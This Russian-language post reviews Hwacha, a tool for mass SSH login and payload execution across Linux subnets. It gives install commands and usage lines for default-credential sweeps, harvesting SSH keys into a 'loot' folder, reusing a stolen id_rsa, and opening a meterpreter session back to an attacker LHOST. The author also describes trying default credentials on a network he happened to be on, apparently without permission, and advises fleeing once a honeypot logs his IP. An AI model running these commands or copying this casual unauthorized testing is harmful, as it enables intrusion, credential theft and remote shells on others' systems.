Hwacha и встреча с honeypot

Несколько необычное будет сегодня описание инструмента , с которым вас хочу познакомить.
Автором его является N00py . Это человек , который увлекается пентестом.

Hwacha была в очень далёкие времена известна ,как "Огненная повозка" .
И являлась оружием массового поражения пехоты противника.
Сегодня мы видим её реинкарнацию в кибероружие современности ,что не отменяет качеств в многоцелевой атаке.

Hwacha - инструмент быстрый , простой в обращении и был задуман заполнить те пробелы , которые замечены в CrackMapExec.
Но при этом , обладающий уникальным собственным функционалом .
И если CrackMapExec специализируется на Windows в основном , то Hwacha умеет проводить те же атаки ,только на Linux.

И отличается быстротой выполнения полезных нагрузок на таких системах.
Способным собрать артефакты и выполнить shell- код во всей подсети.

Автор обзора и Администрация ресурса предупреждают о запрете использования рассматриваемого инструмента в незаконных целях.
Вся информация предоставлена для ознакомления и изучения проблем безопасности.


Установка Hwacha:

git clone https://github.com/n00py/Hwacha.git

cd Hwacha

chmod +x hwacha.py

pip install paramiko

python hwacha.py - команда запуска.

Примеры запуска

python hwacha.py -t 192.168.1.1/24 -u admin -p password

python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id

python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"

 
 


Рассчитан инструмент на то,что вам известен логин и пароль.
Он может работать с дефолтными данными.
Видим,что ему возможно задать количество хостов в подсети,как и указать саму подсеть.
Не забывайте , что команда с задачей meterpreter-сессии нацелена на Linux-системы.

Мне понравилось , как инструмент справляется с задачами и быстро обрабатывает цели.
Только не всегда выпадает случай , чтобы первое же тестирование на массовость началось со знакомства с honeypot.
И я не мог пройти мимо такого , чтобы не поделиться с вами как это выглядит на самом деле.

Также хочу предостеречь тех ,кто привык работать с большим количеством целей.
Много было разговоров о том, как можно нарваться на honeypot при этом.



Началось всё с того,что я подумал,почему бы не поработать с дефолтными данными в сети, где я находился на тот момент.
И хотел просто вам показать как выглядит положительный результат,когда инструмент демонстрирует авторизацию.


Но правилом хорошего тона ,да и безопасности ,является хотя бы минимальная разведка ,с чем имеешь дело.
Вот в чём опасность данного инструмента - он авторизовывается , и "мой IP" попал в список атакующих.
И всегда проверяйте цель , начиная со сбора информации о ней , прежде ,чем тестировать.

Сканер Nmap , начал присылать отчёты , которые ему не свойственны.
Да , он определил и сервис в итоге ,который охраняет honeypot по этой подсети.
И перенаправляет атакующего в случае подозрительной активности в ловушку.

Вот на данном этапе ,у меня сразу возникли подозрения.
Как так ,при обычном сканировании цели , вот вам и ключи и много ещё чего ?

Здесь матёрый honeypot и не думает маскировать себя.

Ну и решил я на него посмотреть в итоге , обратившись к нему через ссылку в nmap
Вот этот мощный красавец.

Видим на его странице уведомления о сборе информации , злоумышленниках в сетях и прочее.
Вот его отчёт в графическом изображении , где можно увидеть всю его , отнюдь не гротескность , а величие.

Впрочем , можно конечно здесь же атаковать Apache и охраняемый ресурс.
Но , впечатление такое ,что всё-таки это статический крупный и опасный honeypot.

Когда видите при сканировании вот такое , то надеюсь теперь , знаете что делать (бежать надо ))
Здесь видно ,как honeypot фиксирует время и пытается выполнить свои скрипты ,чтобы выжать максимум информации в ответ через nmap.


В заключении , рекомендую почитать страницу автора здесь
Где вы сможете увидеть увлекательный пример авторского пентеста с применением инструмента Hwacha.

Прошу вас быть осторожными и этичными .